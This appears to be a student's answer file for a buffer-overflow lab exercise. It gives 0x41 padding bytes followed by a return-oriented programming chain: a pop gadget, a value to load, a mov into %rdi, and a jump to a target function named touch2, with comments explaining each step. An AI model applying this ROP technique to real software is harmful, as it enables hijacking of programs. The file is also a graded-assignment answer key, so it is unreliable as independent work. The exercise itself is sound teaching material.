41 41 41 41
41 41 41 41
41 41 41 41
41 41 41 41
41 41 41 41
41 41 41 41
41 41 41 41
41 41 41 41
41 41 41 41
41 41 41 41

/* we want to call touch2 with value 0x6632344e */
/* i.e. we need popq %rdi where 0x6632344e is on the top of the stack */

/*
at addr 402027 we have movq %rax, %rdi, followed by ret
at addr 40203d we have popq %rax, nop, nop, followed by ret
*/

3d 20 40 00 00 00 00 00 /* first gadget, will pop the following line */ 
4e 34 32 66 00 00 00 00 /* value to be popped */
27 20 40 00 00 00 00 00 /* now we move the value into %rdi */
37 1e 40 00 00 00 00 00 /* now we jump to touch2 */
